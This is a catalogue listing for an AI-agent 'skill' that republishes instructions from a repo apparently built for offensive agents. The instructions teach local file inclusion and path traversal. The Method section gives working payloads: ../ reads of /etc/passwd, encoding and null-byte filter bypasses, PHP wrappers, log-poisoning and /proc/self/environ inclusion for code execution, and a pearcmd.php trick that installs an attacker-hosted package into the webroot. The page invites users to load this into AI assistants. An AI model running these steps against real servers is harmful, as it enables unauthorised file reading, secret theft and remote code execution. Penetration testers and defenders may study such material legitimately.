LFI / path traversal
SkillFiles & storageLocal File Inclusion / path traversal → read files, sometimes RCE. Load when a param names a file/path/template/page: ?file=, ?page=, ?template=, ?download=, ?lang=, or path segments. Signals: filenames in params, "include", download endpoints, `../` filtered, `.php?page=`.
Instructions available. Your AI can read the instructions. Execution depends on the setup they require.
Account requirements not reviewed. Check the skill instructions before use; ahel provides instructions and does not run this skill.
Add ahel to your AI once: Claude, ChatGPT, Cursor, Claude Code or Codex. Then ask it to use this.
Then ask your AI: use the LFI / path traversal skill
What this skill tells your AI
The instructions your AI receives, as published by noorqureshi/sploitagent in skills/web/web-lfi-path-traversal/SKILL.md and read by ahel’s review.
When it applies
A parameter or path segment controls which file the server reads/includes. Path traversal reads arbitrary files; LFI (include) can execute them → RCE.
Why it works
The app builds a filesystem path from user input without normalizing/constraining it, so ../
sequences escape the intended directory. If the value is included (PHP), included content is executed.
Method
- Read a canary:
?file=/etc/passwd, then traversal?file=../../../../etc/passwd; on Windows..\..\..\windows\win.ini. - Defeat filters: URL-encode
..%2f, double..%252f,....//(strip-once), overlong%c0%af, null%00(old PHP), absolute paths, nested..... - PHP wrappers → source/RCE:
php://filter/convert.base64-encode/resource=index.php(read source),data:///expect://, and log poisoning (write PHP into a log via User-Agent, then include the log) or session//proc/self/environinclusion for RCE. - PEAR
pearcmd.phpLFI→RCE (very common on PHP hosts withregister_argc_argv=Onand PEAR installed): include/usr/local/lib/php/pearcmd.phpand pass args via the query string, e.g.?file=/usr/local/lib/php/pearcmd.php&+install+--installroot=/var/www/html+<attacker.tgz-URL>to write attacker-controlled content into the webroot, then request it. The trick is thatregister_argc_argvletspearcmdreadargvfrom the URL query — no upload needed. - Enumerate targets: config files, keys, app source, history files, and an exposed
/.git/(grab.git/HEAD/config→ dump the repo →git log -pfor deleted secrets);ffufa LFI wordlist.
Gotchas
- A forced extension (
include $p.".php") blocks arbitrary read → try wrappers or null byte (old PHP). - Traversal (read-only) vs LFI (include→exec) are different ceilings — check whether output is executed.
- Read the app's own source via
php://filterto find the next bug faster.
Verify success
Contents of a file outside the intended directory returned (e.g. /etc/passwd, app config/
source), or code execution via a wrapper/log-poisoning include.
References
PortSwigger path-traversal labs; LFI-to-RCE cheat sheets; OWASP path traversal.
Signals
- GitHub stars
- 20
- Forks
- 7
- Last commit
- Sep 2026
Advanced
- Item type
- skill
- Key
web-lfi-path-traversal- Source
- github.com/noorqureshi/sploitagent
github.com/noorqureshi/sploitagent